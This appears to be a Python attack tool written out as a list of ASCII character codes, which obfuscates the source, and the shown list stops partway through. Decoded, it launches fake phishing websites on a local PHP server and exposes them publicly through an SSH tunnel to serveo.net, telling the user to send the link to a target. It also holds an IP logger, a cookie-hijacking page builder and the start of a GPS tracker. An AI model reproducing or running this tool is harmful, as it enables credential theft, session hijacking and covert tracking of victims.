d=[35, 45, 42, 45, 99, 111, 100, 105, 110, 103, 58, 117, 116, 102, 45, 56, 45, 42, 45, 10, 35, 32, 67, 111, 100, 101, 100, 32, 66, 121, 32, 68, 101, 114, 97, 121, 10, 39, 39, 39, 10, 9, 32, 82, 101, 98, 117, 105, 108, 100, 32, 67, 111, 112, 121, 114, 105, 103, 104, 116, 32, 67, 97, 110, 39, 116, 32, 109, 97, 107, 101, 32, 117, 32, 114, 101, 97, 108, 32, 112, 114, 111, 103, 114, 97, 109, 109, 101, 114, 10, 39, 39, 39, 10, 35, 32, 82, 101, 112, 111, 114, 116, 32, 66, 117, 103, 32, 79, 110, 32, 77, 121, 32, 79, 116, 104, 101, 114, 32, 83, 111, 115, 109, 101, 100, 10, 35, 32, 105, 110, 115, 116, 97, 103, 114, 97, 109, 58, 32, 64, 114, 101, 121, 121, 48, 53, 95, 10, 35, 32, 102, 97, 99, 101, 98, 111, 111, 107, 58, 32, 104, 116, 116, 112, 115, 58, 47, 47, 102, 97, 99, 101, 98, 111, 111, 107, 46, 99, 111, 109, 47, 97, 99, 104, 109, 97, 100, 46, 108, 117, 116, 104, 102, 105, 46, 104, 97, 100, 105, 46, 51, 10, 10, 105, 109, 112, 111, 114, 116, 32, 111, 115, 10, 105, 109, 112, 111, 114, 116, 32, 115, 121, 115, 10, 105, 109, 112, 111, 114, 116, 32, 116, 105, 109, 101, 10, 105, 109, 112, 111, 114, 116, 32, 114, 101, 113, 117, 101, 115, 116, 115, 10, 102, 114, 111, 109, 32, 100, 97, 116, 97, 32, 105, 109, 112, 111, 114, 116, 32, 115, 101, 114, 118, 101, 114, 10, 102, 114, 111, 109, 32, 100, 97, 116, 97, 46, 99, 111, 108, 111, 114, 32, 105, 109, 112, 111, 114, 116, 32, 42, 10, 102, 114, 111, 109, 32, 100, 97, 116, 97, 32, 105, 109, 112, 111, 114, 116, 32, 99, 97, 99, 104, 101, 10, 105, 109, 112, 111, 114, 116, 32, 115, 117, 98, 112, 114, 111, 99, 101, 115, 115, 32, 97, 115, 32, 107, 111, 110, 116, 111, 108, 10, 10, 99, 97, 99, 104, 101, 46, 99, 108, 101, 97, 110, 67, 97, 99, 104, 101, 40, 41, 10, 10, 99, 108, 97, 115, 115, 32, 99, 101, 107, 95, 114, 101, 113, 117, 105, 114, 101, 100, 58, 10, 9, 100, 101, 102, 32, 95, 95, 105, 110, 105, 116, 95, 95, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 119, 105, 116, 104, 32, 111, 112, 101, 110, 40, 34, 100, 97, 116, 97, 47, 108, 111, 103, 46, 116, 120, 116, 34, 44, 34, 119, 34, 41, 32, 97, 115, 32, 115, 58, 10, 9, 9, 9, 116, 114, 121, 58, 10, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 91, 34, 119, 104, 105, 99, 104, 34, 44, 34, 115, 115, 104, 34, 93, 44, 10, 9, 9, 9, 9, 115, 116, 100, 101, 114, 114, 61, 115, 44, 115, 116, 100, 105, 110, 61, 115, 44, 115, 116, 100, 111, 117, 116, 61, 115, 41, 10, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 49, 41, 10, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 91, 34, 119, 104, 105, 99, 104, 34, 44, 34, 112, 104, 112, 34, 93, 44, 10, 9, 9, 9, 9, 115, 116, 100, 101, 114, 114, 61, 115, 44, 115, 116, 100, 105, 110, 61, 115, 44, 115, 116, 100, 111, 117, 116, 61, 115, 41, 10, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 49, 41, 10, 9, 9, 9, 101, 120, 99, 101, 112, 116, 58, 112, 97, 115, 115, 10, 9, 9, 9, 119, 104, 105, 108, 101, 32, 84, 114, 117, 101, 58, 10, 9, 9, 9, 9, 111, 61, 111, 112, 101, 110, 40, 34, 100, 97, 116, 97, 47, 108, 111, 103, 46, 116, 120, 116, 34, 41, 46, 114, 101, 97, 100, 40, 41, 10, 9, 9, 9, 9, 105, 102, 32, 34, 47, 115, 115, 104, 34, 32, 105, 110, 32, 111, 58, 10, 9, 9, 9, 9, 9, 112, 97, 115, 115, 10, 9, 9, 9, 9, 101, 108, 115, 101, 58, 10, 9, 9, 9, 9, 9, 115, 121, 115, 46, 101, 120, 105, 116, 40, 34, 37, 115, 91, 33, 93, 37, 115, 32, 111, 112, 101, 110, 115, 115, 104, 32, 110, 111, 116, 32, 105, 110, 115, 116, 97, 108, 108, 101, 100, 34, 37, 40, 82, 44, 78, 41, 41, 10, 9, 9, 9, 9, 105, 102, 32, 34, 47, 112, 104, 112, 34, 32, 105, 110, 32, 111, 58, 10, 9, 9, 9, 9, 9, 98, 114, 101, 97, 107, 10, 9, 9, 9, 9, 101, 108, 115, 101, 58, 10, 9, 9, 9, 9, 9, 115, 121, 115, 46, 101, 120, 105, 116, 40, 34, 37, 115, 91, 33, 93, 37, 115, 32, 112, 104, 112, 32, 110, 111, 116, 32, 105, 110, 115, 116, 97, 108, 108, 101, 100, 46, 34, 37, 40, 82, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 10, 9, 9, 9, 9, 9, 10, 99, 108, 97, 115, 115, 32, 112, 104, 105, 115, 105, 110, 103, 40, 41, 58, 10, 9, 100, 101, 102, 32, 95, 95, 105, 110, 105, 116, 95, 95, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 99, 101, 107, 95, 114, 101, 113, 117, 105, 114, 101, 100, 40, 41, 10, 9, 9, 115, 101, 108, 102, 46, 110, 103, 101, 110, 116, 111, 100, 40, 41, 10, 9, 100, 101, 102, 32, 110, 103, 101, 110, 116, 111, 100, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 115, 101, 108, 102, 46, 97, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 105, 116, 101, 32, 78, 97, 109, 101, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 105, 102, 32, 40, 115, 101, 108, 102, 46, 97, 32, 61, 61, 32, 34, 34, 41, 58, 10, 9, 9, 9, 114, 101, 116, 117, 114, 110, 32, 115, 101, 108, 102, 46, 110, 103, 101, 110, 116, 111, 100, 40, 41, 10, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 80, 108, 101, 97, 115, 101, 32, 87, 97, 105, 116, 32, 67, 114, 101, 97, 116, 105, 110, 103, 32, 70, 97, 107, 101, 32, 87, 101, 98, 115, 105, 116, 101, 115, 32, 46, 46, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 115, 101, 108, 102, 46, 103, 101, 110, 101, 114, 97, 116, 101, 40, 41, 10, 9, 9, 10, 9, 100, 101, 102, 32, 103, 101, 110, 101, 114, 97, 116, 101, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 119, 105, 116, 104, 32, 111, 112, 101, 110, 40, 34, 100, 97, 116, 97, 47, 108, 111, 103, 46, 116, 120, 116, 34, 44, 34, 119, 34, 41, 32, 97, 115, 32, 109, 101, 109, 101, 107, 58, 10, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 10, 9, 9, 9, 9, 9, 9, 91, 34, 112, 104, 112, 34, 44, 34, 45, 83, 34, 44, 34, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 44, 34, 45, 116, 34, 44, 10, 9, 9, 9, 9, 9, 9, 34, 114, 97, 119, 47, 115, 101, 114, 118, 101, 114, 47, 112, 104, 105, 115, 105, 110, 103, 34, 93, 44, 10, 9, 9, 9, 9, 9, 9, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 10, 9, 9, 9, 9, 9, 9, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 101, 107, 10, 9, 9, 9, 41, 10, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 51, 41, 10, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 79, 112, 101, 110, 32, 78, 101, 119, 32, 84, 97, 98, 32, 65, 110, 100, 32, 82, 117, 110, 32, 37, 115, 97, 115, 117, 46, 112, 121, 37, 115, 32, 115, 101, 108, 101, 99, 116, 32, 83, 101, 114, 118, 101, 114, 32, 76, 105, 115, 116, 101, 110, 101, 114, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 101, 110, 100, 32, 84, 104, 105, 115, 32, 76, 105, 110, 107, 32, 79, 110, 32, 89, 111, 117, 114, 32, 84, 97, 114, 103, 101, 116, 32, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 112, 114, 101, 115, 115, 32, 39, 37, 115, 121, 101, 115, 37, 115, 39, 32, 113, 117, 105, 99, 107, 108, 121, 32, 105, 102, 32, 121, 111, 117, 32, 102, 105, 110, 100, 32, 97, 32, 113, 117, 101, 115, 116, 105, 111, 110, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 119, 97, 105, 116, 105, 110, 103, 32, 115, 101, 114, 118, 101, 114, 32, 97, 99, 116, 105, 118, 101, 32, 46, 46, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 91, 10, 9, 9, 9, 9, 9, 34, 115, 115, 104, 34, 44, 34, 45, 82, 34, 44, 10, 9, 9, 9, 9, 9, 34, 123, 125, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 58, 56, 48, 58, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 46, 102, 111, 114, 109, 97, 116, 40, 10, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 97, 41, 44, 10, 9, 9, 9, 9, 9, 34, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 93, 44, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 10, 9, 9, 9, 9, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 101, 107, 10, 9, 9, 9, 41, 10, 9, 9, 9, 119, 104, 105, 108, 101, 32, 84, 114, 117, 101, 58, 10, 9, 9, 9, 9, 114, 61, 114, 101, 113, 117, 101, 115, 116, 115, 46, 103, 101, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 37, 115, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 37, 40, 115, 101, 108, 102, 46, 97, 41, 41, 10, 9, 9, 9, 9, 105, 102, 32, 114, 46, 115, 116, 97, 116, 117, 115, 95, 99, 111, 100, 101, 32, 61, 61, 32, 50, 48, 48, 58, 10, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 53, 41, 10, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 98, 101, 110, 103, 111, 110, 103, 40, 41, 10, 9, 9, 9, 9, 9, 98, 114, 101, 97, 107, 10, 9, 9, 9, 9, 9, 111, 115, 46, 115, 121, 115, 116, 101, 109, 40, 34, 107, 105, 108, 108, 97, 108, 108, 32, 112, 104, 112, 59, 107, 105, 108, 108, 97, 108, 108, 32, 115, 115, 104, 34, 41, 10, 9, 100, 101, 102, 32, 98, 101, 110, 103, 111, 110, 103, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 119, 104, 105, 108, 101, 32, 84, 114, 117, 101, 58, 10, 9, 9, 9, 97, 61, 91, 34, 124, 34, 44, 34, 47, 34, 44, 34, 45, 34, 44, 34, 92, 92, 34, 93, 10, 9, 9, 9, 102, 111, 114, 32, 120, 32, 105, 110, 32, 97, 58, 10, 9, 9, 9, 9, 112, 114, 105, 110, 116, 32, 34, 92, 114, 91, 123, 125, 43, 123, 125, 93, 32, 82, 117, 110, 110, 105, 110, 103, 32, 87, 101, 98, 115, 101, 114, 118, 101, 114, 58, 32, 104, 116, 116, 112, 58, 47, 47, 123, 125, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 32, 46, 46, 32, 123, 125, 32, 32, 34, 46, 102, 111, 114, 109, 97, 116, 40, 71, 44, 78, 44, 115, 101, 108, 102, 46, 97, 44, 10, 9, 9, 9, 9, 120, 10, 9, 9, 9, 9, 41, 44, 59, 115, 121, 115, 46, 115, 116, 100, 111, 117, 116, 46, 102, 108, 117, 115, 104, 40, 41, 59, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 48, 46, 50, 48, 41, 10, 9, 9, 9, 9, 9, 9, 9, 10, 99, 108, 97, 115, 115, 32, 108, 111, 99, 97, 116, 111, 114, 40, 41, 58, 10, 9, 100, 101, 102, 32, 95, 95, 105, 110, 105, 116, 95, 95, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 99, 101, 107, 95, 114, 101, 113, 117, 105, 114, 101, 100, 40, 41, 10, 9, 9, 115, 101, 108, 102, 46, 105, 112, 76, 111, 103, 103, 101, 114, 40, 41, 10, 9, 100, 101, 102, 32, 105, 112, 76, 111, 103, 103, 101, 114, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 105, 102, 32, 111, 115, 46, 112, 97, 116, 104, 46, 101, 120, 105, 115, 116, 115, 40, 34, 114, 97, 119, 47, 115, 101, 114, 118, 101, 114, 47, 99, 111, 111, 107, 105, 101, 72, 105, 103, 104, 74, 97, 99, 107, 105, 110, 103, 47, 105, 110, 100, 101, 120, 46, 112, 104, 112, 34, 41, 58, 10, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 70, 105, 108, 101, 32, 105, 110, 100, 101, 120, 46, 112, 104, 112, 32, 119, 97, 115, 32, 102, 111, 117, 110, 100, 32, 105, 110, 32, 37, 115, 99, 111, 111, 107, 105, 101, 72, 105, 103, 104, 74, 97, 99, 107, 105, 110, 103, 47, 105, 110, 100, 101, 120, 46, 112, 104, 112, 37, 115, 34, 37, 40, 82, 44, 78, 44, 82, 44, 78, 41, 41, 10, 9, 9, 9, 114, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 63, 37, 115, 93, 32, 68, 105, 100, 32, 117, 32, 119, 97, 110, 116, 32, 116, 111, 32, 101, 100, 105, 116, 32, 115, 105, 116, 101, 63, 32, 121, 47, 110, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 105, 102, 32, 114, 46, 108, 111, 119, 101, 114, 40, 41, 32, 61, 61, 32, 34, 121, 34, 58, 10, 9, 9, 9, 9, 115, 101, 108, 102, 46, 97, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 105, 116, 101, 32, 78, 97, 109, 101, 32, 32, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 99, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 72, 84, 77, 76, 32, 84, 105, 116, 108, 101, 32, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 98, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 65, 108, 101, 114, 116, 32, 77, 115, 103, 32, 32, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 100, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 72, 84, 77, 76, 32, 66, 111, 100, 121, 32, 32, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 115, 101, 114, 118, 101, 114, 46, 99, 111, 111, 107, 105, 101, 106, 97, 99, 107, 40, 99, 44, 98, 44, 100, 41, 10, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 80, 108, 101, 97, 115, 101, 32, 87, 97, 105, 116, 32, 67, 114, 101, 97, 116, 105, 110, 103, 32, 70, 97, 107, 101, 32, 87, 101, 98, 115, 105, 116, 101, 115, 32, 46, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 119, 105, 116, 104, 32, 111, 112, 101, 110, 40, 34, 100, 97, 116, 97, 47, 108, 111, 103, 46, 116, 120, 116, 34, 44, 34, 119, 34, 41, 32, 97, 115, 32, 109, 101, 109, 101, 107, 58, 10, 9, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 10, 9, 9, 9, 9, 9, 9, 91, 34, 112, 104, 112, 34, 44, 34, 45, 83, 34, 44, 34, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 44, 34, 45, 116, 34, 44, 10, 9, 9, 9, 9, 9, 9, 34, 114, 97, 119, 47, 115, 101, 114, 118, 101, 114, 47, 99, 111, 111, 107, 105, 101, 72, 105, 103, 104, 74, 97, 99, 107, 105, 110, 103, 34, 93, 44, 10, 9, 9, 9, 9, 9, 9, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 101, 107, 10, 9, 9, 9, 9, 9, 41, 10, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 51, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 79, 112, 101, 110, 32, 78, 101, 119, 32, 84, 97, 98, 32, 65, 110, 100, 32, 82, 117, 110, 32, 37, 115, 97, 115, 117, 46, 112, 121, 37, 115, 32, 115, 101, 108, 101, 99, 116, 32, 83, 101, 114, 118, 101, 114, 32, 76, 105, 115, 116, 101, 110, 101, 114, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 101, 110, 100, 32, 84, 104, 105, 115, 32, 76, 105, 110, 107, 32, 79, 110, 32, 89, 111, 117, 114, 32, 84, 97, 114, 103, 101, 116, 32, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 112, 114, 101, 115, 115, 32, 39, 37, 115, 121, 101, 115, 37, 115, 39, 32, 113, 117, 105, 99, 107, 108, 121, 32, 105, 102, 32, 121, 111, 117, 32, 102, 105, 110, 100, 32, 97, 32, 113, 117, 101, 115, 116, 105, 111, 110, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 119, 97, 105, 116, 105, 110, 103, 32, 115, 101, 114, 118, 101, 114, 32, 97, 99, 116, 105, 118, 101, 32, 46, 46, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 91, 10, 9, 9, 9, 9, 9, 9, 9, 34, 115, 115, 104, 34, 44, 34, 45, 82, 34, 44, 10, 9, 9, 9, 9, 9, 9, 9, 34, 123, 125, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 58, 56, 48, 58, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 46, 102, 111, 114, 109, 97, 116, 40, 10, 9, 9, 9, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 97, 41, 44, 10, 9, 9, 9, 9, 9, 9, 9, 34, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 10, 9, 9, 9, 9, 9, 93, 44, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 101, 107, 41, 10, 9, 9, 9, 9, 9, 119, 104, 105, 108, 101, 32, 84, 114, 117, 101, 58, 10, 9, 9, 9, 9, 9, 9, 114, 61, 114, 101, 113, 117, 101, 115, 116, 115, 46, 103, 101, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 37, 115, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 37, 40, 115, 101, 108, 102, 46, 97, 41, 41, 10, 9, 9, 9, 9, 9, 9, 105, 102, 32, 114, 46, 115, 116, 97, 116, 117, 115, 95, 99, 111, 100, 101, 32, 61, 61, 32, 50, 48, 48, 58, 10, 9, 9, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 53, 41, 10, 9, 9, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 98, 101, 110, 103, 111, 110, 103, 40, 41, 10, 9, 9, 9, 9, 9, 9, 9, 98, 114, 101, 97, 107, 10, 9, 9, 9, 9, 9, 9, 9, 111, 115, 46, 115, 121, 115, 116, 101, 109, 40, 34, 107, 105, 108, 108, 97, 108, 108, 32, 112, 104, 112, 59, 107, 105, 108, 108, 97, 108, 108, 32, 115, 115, 104, 34, 41, 10, 9, 9, 9, 101, 108, 115, 101, 58, 10, 9, 9, 9, 9, 115, 101, 108, 102, 46, 97, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 105, 116, 101, 32, 78, 97, 109, 101, 32, 32, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 80, 108, 101, 97, 115, 101, 32, 87, 97, 105, 116, 32, 67, 114, 101, 97, 116, 105, 110, 103, 32, 70, 97, 107, 101, 32, 87, 101, 98, 115, 105, 116, 101, 115, 32, 46, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 119, 105, 116, 104, 32, 111, 112, 101, 110, 40, 34, 100, 97, 116, 97, 47, 108, 111, 103, 46, 116, 120, 116, 34, 44, 34, 119, 34, 41, 32, 97, 115, 32, 109, 101, 109, 101, 107, 58, 10, 9, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 10, 9, 9, 9, 9, 9, 9, 91, 34, 112, 104, 112, 34, 44, 34, 45, 83, 34, 44, 34, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 44, 34, 45, 116, 34, 44, 10, 9, 9, 9, 9, 9, 9, 34, 114, 97, 119, 47, 115, 101, 114, 118, 101, 114, 47, 99, 111, 111, 107, 105, 101, 72, 105, 103, 104, 74, 97, 99, 107, 105, 110, 103, 34, 93, 44, 10, 9, 9, 9, 9, 9, 9, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 101, 107, 10, 9, 9, 9, 9, 9, 41, 10, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 52, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 79, 112, 101, 110, 32, 78, 101, 119, 32, 84, 97, 98, 32, 65, 110, 100, 32, 82, 117, 110, 32, 37, 115, 97, 115, 117, 46, 112, 121, 37, 115, 32, 115, 101, 108, 101, 99, 116, 32, 83, 101, 114, 118, 101, 114, 32, 76, 105, 115, 116, 101, 110, 101, 114, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 101, 110, 100, 32, 84, 104, 105, 115, 32, 76, 105, 110, 107, 32, 79, 110, 32, 89, 111, 117, 114, 32, 84, 97, 114, 103, 101, 116, 32, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 112, 114, 101, 115, 115, 32, 39, 37, 115, 121, 101, 115, 37, 115, 39, 32, 113, 117, 105, 99, 107, 108, 121, 32, 105, 102, 32, 121, 111, 117, 32, 102, 105, 110, 100, 32, 97, 32, 113, 117, 101, 115, 116, 105, 111, 110, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 119, 97, 105, 116, 105, 110, 103, 32, 115, 101, 114, 118, 101, 114, 32, 97, 99, 116, 105, 118, 101, 32, 46, 46, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 91, 10, 9, 9, 9, 9, 9, 9, 9, 34, 115, 115, 104, 34, 44, 34, 45, 82, 34, 44, 10, 9, 9, 9, 9, 9, 9, 9, 34, 123, 125, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 58, 56, 48, 58, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 46, 102, 111, 114, 109, 97, 116, 40, 10, 9, 9, 9, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 97, 41, 44, 10, 9, 9, 9, 9, 9, 9, 9, 34, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 10, 9, 9, 9, 9, 9, 93, 44, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 101, 107, 41, 10, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 53, 41, 10, 9, 9, 9, 9, 9, 119, 104, 105, 108, 101, 32, 84, 114, 117, 101, 58, 10, 9, 9, 9, 9, 9, 9, 114, 61, 114, 101, 113, 117, 101, 115, 116, 115, 46, 103, 101, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 37, 115, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 37, 40, 115, 101, 108, 102, 46, 97, 41, 41, 10, 9, 9, 9, 9, 9, 9, 105, 102, 32, 114, 46, 115, 116, 97, 116, 117, 115, 95, 99, 111, 100, 101, 32, 61, 61, 32, 50, 48, 48, 58, 10, 9, 9, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 53, 41, 10, 9, 9, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 98, 101, 110, 103, 111, 110, 103, 40, 41, 10, 9, 9, 9, 9, 9, 9, 9, 98, 114, 101, 97, 107, 10, 9, 9, 9, 9, 9, 9, 9, 111, 115, 46, 115, 121, 115, 116, 101, 109, 40, 34, 107, 105, 108, 108, 97, 108, 108, 32, 112, 104, 112, 59, 107, 105, 108, 108, 97, 108, 108, 32, 115, 115, 104, 34, 41, 10, 9, 100, 101, 102, 32, 98, 101, 110, 103, 111, 110, 103, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 119, 104, 105, 108, 101, 32, 84, 114, 117, 101, 58, 10, 9, 9, 9, 97, 61, 91, 34, 124, 34, 44, 34, 47, 34, 44, 34, 45, 34, 44, 34, 92, 92, 34, 93, 10, 9, 9, 9, 102, 111, 114, 32, 120, 32, 105, 110, 32, 97, 58, 10, 9, 9, 9, 9, 112, 114, 105, 110, 116, 32, 34, 92, 114, 91, 123, 125, 43, 123, 125, 93, 32, 82, 117, 110, 110, 105, 110, 103, 32, 87, 101, 98, 115, 101, 114, 118, 101, 114, 58, 32, 104, 116, 116, 112, 58, 47, 47, 123, 125, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 32, 46, 46, 32, 123, 125, 32, 32, 34, 46, 102, 111, 114, 109, 97, 116, 40, 71, 44, 78, 44, 115, 101, 108, 102, 46, 97, 44, 10, 9, 9, 9, 9, 120, 10, 9, 9, 9, 9, 41, 44, 59, 115, 121, 115, 46, 115, 116, 100, 111, 117, 116, 46, 102, 108, 117, 115, 104, 40, 41, 59, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 48, 46, 50, 48, 41, 10, 9, 9, 9, 9, 10, 99, 108, 97, 115, 115, 32, 103, 112, 115, 40, 41, 58, 10, 9, 100, 101, 102, 32, 95, 95, 105, 110, 105, 116, 95, 95, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 99, 101, 107, 95, 114, 101, 113, 117, 105, 114, 101, 100, 40, 41, 10, 9, 9, 115, 101, 108, 102, 46, 103, 112, 115, 40, 41, 